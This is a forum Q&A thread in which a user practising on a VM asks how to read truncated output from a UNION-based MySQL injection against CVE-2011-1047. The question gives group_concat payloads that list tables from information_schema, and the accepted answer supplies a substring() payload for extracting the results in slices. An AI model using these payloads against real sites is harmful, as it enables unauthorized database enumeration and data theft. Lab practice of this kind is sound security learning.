# SQL injection in limited space

Tags: sql-injection, mysql

This might seem like a noob question. I am currently trying SQL injection on a VM. This is what I am trying

```
union select group_concat(table_name) from information_schema.tables#
```

And the injection works. But the page that is returned is an XML file and each tag has a size limitation, so I can see only half of the results.

```
<title>Bla Forum - Topic:  CHARACTER_SETS,COLLATIONS,COLLATION_CHARACTER_SET_APPLICABILITY,COLUMNS,COLUMN_PRIVILEGES,KEY_COLUMN_USAGE,PROFILING,ROUTINES,SCHEMATA,SCHEMA_PRIVILEGES,STATISTICS,TABLES,TABLE_CONSTRAINTS,TABLE_PRIVILEGES,TRIGGERS,USER_PRIVILEGES,VIEWS,columns_priv,db,func,help_category,help_keyword,help_relation,help_topic,host,proc,procs_priv,tables_pri </title>
```

Is there a way to print the second half of the results. The table that I need to see contains the word "user". If I'm too ambiguous I want to do something along the lines of:

1. Arrange the rows of the result and then `group_concat` it
2. Slice the result (as in `string[10:]`)
3. Select all the rows after `tables_priv`

---

**What I already tried:**

```
union select group_concat(table_name) from information_schema.tables where table_name regexp 'user'#
```

Nothing is printed out. But this query works when I directly try it in the VM's MySQL (after omitting the 'union' and the '#').

```
union select group_concat(table_name) from information_schema.tables where table_name like 'user'#
```

Didn't work on neither the web application nor directly in VM's MySQL.

**PS.** I know sqlmap will do the job for me, but I want to try things manually.

**PPS.** I am trying CVE-2011-1047 (topic parameter in feed.php)

Answer (score 2, accepted):

There must be string manipulation routines or sth in mysql. Then you simply do a

```
union select substring(group_concat(table_name),1,10) from information_schema.tables#
```

or something like that and then you execute the query for each slice...

Comment: Thanks a lot. This actually worked. Been breaking my head on this for a quite some time now. Didn't know there was a substring() function in mysql.